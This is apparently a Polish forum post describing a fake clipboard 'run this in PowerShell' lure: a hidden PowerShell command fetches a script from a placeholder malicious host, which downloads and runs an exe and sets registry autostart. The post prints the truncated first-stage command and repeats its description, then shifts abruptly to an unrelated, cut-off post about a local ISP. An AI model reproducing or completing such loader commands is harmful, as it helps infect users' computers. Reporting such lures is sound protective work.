Takie coś mi wyskoczyło na jednej stronie, przy wyłączonym adblocku.
W schowku była komenda do wykonania w powershellu. To był jakiś prosty skrypt, który ściągał plik tekstowy i uruchamiał go jako kolejny skrypt. Drugi skrypt z pliku tekstowego ściągał plik zip, rozpakowywał, uruchamiał exe z katalogu. Exe rozgaszczał się jak sądzę w AppData a do rejestru dodawany był wpis potrzebny do autostartu.
Pierwszy skrypt
W schowku była komenda do wykonania w powershellu. To był jakiś prosty skrypt, który ściągał plik tekstowy i uruchamiał go jako kolejny skrypt. Drugi skrypt z pliku tekstowego ściągał plik zip, rozpakowywał, uruchamiał exe z katalogu. Exe rozgaszczał się jak sądzę w AppData a do rejestru dodawany był wpis potrzebny do autostartu.
Pierwszy skrypt
powershell.exe -W Hidden -command $url = 'adreszlosliwejstronyinternetowej.com/n2.txt'; $response









Mój lokalny ISP też nie podpisuje już umów za więcej niż rok. Na logikę. lepiej byłoby klienta dłużej trzymać, żeby nie uciekł. Chyba, że planują cyklicznie podwyższać ceny - wtedy miałoby to sens.
Dodatkowo, Play wykupił mojego ISP z całą infrastrukturą, ale na razie chyba nie zmieniają marki na play, mają tylko udostępnić całą infrastrukturę innym podmiotom. Myślicie, że będzie to